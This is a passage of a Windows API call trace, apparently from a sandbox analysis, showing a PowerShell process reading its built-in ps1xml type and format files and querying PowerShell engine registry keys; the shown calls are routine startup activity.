	[0789.742] ReadFile (in: hFile=0x300, lpBuffer=0x2c034e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c034e8*, lpNumberOfBytesRead=0x16d6a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0789.742] ReadFile (in: hFile=0x300, lpBuffer=0x2c02943, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c02943*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0789.742] ReadFile (in: hFile=0x300, lpBuffer=0x2c034e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c034e8*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0789.745] CloseHandle (hObject=0x300) returned 1
	[0789.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.750] SetErrorMode (uMode=0x1) returned 0x1
	[0789.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d620 | out: lpFileInformation=0x16d620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0789.750] SetErrorMode (uMode=0x1) returned 0x1
	[0789.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x300) returned 0x0
	[0789.753] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x56) returned 0x0
	[0789.753] CoTaskMemAlloc (cb=0x5a) returned 0x2a70a0
	[0789.753] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d65c, lpData=0x2a70a0, lpcbData=0x16d658*=0x56 | out: lpType=0x16d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d658*=0x56) returned 0x0
	[0790.815] CoTaskMemFree (pv=0x2a70a0) 
	[0790.815] RegCloseKey (hKey=0x300) returned 0x0
	[0790.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0790.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0790.848] VirtualQuery (in: lpAddress=0x16c3f0, lpBuffer=0x16d2b0, dwLength=0x30 | out: lpBuffer=0x16d2b0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0791.596] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0791.597] GetFileType (hFile=0x300) returned 0x1
	[0791.597] SetErrorMode (uMode=0x1) returned 0x1
	[0791.597] GetFileType (hFile=0x300) returned 0x1
	[0791.597] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.597] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.597] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.597] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.598] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.598] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.598] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.598] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.598] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.600] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.600] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.601] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.601] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.601] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.602] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.602] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.602] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.618] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.618] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.619] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.619] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.619] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.620] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.620] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.620] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.621] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.621] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.621] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.622] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.622] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.622] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.623] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.623] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.628] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.628] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.628] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.629] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.629] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.629] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.630] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.630] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0791.630] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0791.630] ReadFile (in: hFile=0x300, lpBuffer=0x2c6a6a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c6a6a8*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0791.631] CloseHandle (hObject=0x300) returned 1
	[0791.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.631] SetErrorMode (uMode=0x1) returned 0x1
	[0791.631] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d620 | out: lpFileInformation=0x16d620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0791.631] SetErrorMode (uMode=0x1) returned 0x1
	[0791.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.631] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x300) returned 0x0
	[0791.632] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x56) returned 0x0
	[0791.632] CoTaskMemAlloc (cb=0x5a) returned 0x1b73dee0
	[0791.632] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d65c, lpData=0x1b73dee0, lpcbData=0x16d658*=0x56 | out: lpType=0x16d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d658*=0x56) returned 0x0
	[0791.632] CoTaskMemFree (pv=0x1b73dee0) 
	[0791.632] RegCloseKey (hKey=0x300) returned 0x0
	[0791.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0798.949] VirtualQuery (in: lpAddress=0x16c3f0, lpBuffer=0x16d2b0, dwLength=0x30 | out: lpBuffer=0x16d2b0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0800.798] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0800.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.798] CoTaskMemFree (pv=0x2b4a20) 
	[0801.705] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8a8 | out: phkResult=0x16d8a8*=0x2ec) returned 0x0
	[0801.705] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d8bc, lpData=0x0, lpcbData=0x16d8b8*=0x0 | out: lpType=0x16d8bc*=0x1, lpData=0x0, lpcbData=0x16d8b8*=0x74) returned 0x0
	[0801.705] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d82c, lpData=0x0, lpcbData=0x16d828*=0x0 | out: lpType=0x16d82c*=0x1, lpData=0x0, lpcbData=0x16d828*=0x74) returned 0x0
	[0801.706] CoTaskMemAlloc (cb=0x78) returned 0x2424c0
	[0801.706] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d7fc, lpData=0x2424c0, lpcbData=0x16d7f8*=0x74 | out: lpType=0x16d7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7f8*=0x74) returned 0x0
	[0801.706] CoTaskMemFree (pv=0x2424c0) 
	[0801.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0801.706] SetErrorMode (uMode=0x1) returned 0x1
	[0801.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d780 | out: lpFileInformation=0x16d780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0801.707] SetErrorMode (uMode=0x1) returned 0x1
	[0801.708] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0801.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.708] CoTaskMemFree (pv=0x2b4a20) 
	[0801.716] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0801.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.717] CoTaskMemFree (pv=0x2b4a20) 
	[0801.717] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0801.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.717] CoTaskMemFree (pv=0x2b4a20) 
	[0801.718] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0801.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.718] CoTaskMemFree (pv=0x2b4a20) 
	[0801.718] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0801.718] GetFileType (hFile=0x300) returned 0x1
	[0801.718] SetErrorMode (uMode=0x1) returned 0x1
	[0801.718] GetFileType (hFile=0x300) returned 0x1
	[0801.720] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0801.722] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0801.723] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0801.723] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.580] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.580] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.580] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x9e2, lpOverlapped=0x0) returned 1
	[0802.580] ReadFile (in: hFile=0x300, lpBuffer=0x33116ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33116ea*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0802.580] ReadFile (in: hFile=0x300, lpBuffer=0x33121a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33121a0*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0802.581] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x300) returned 0x0
	[0802.581] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0802.581] CoTaskMemAlloc (cb=0x5a) returned 0x1b73dd90
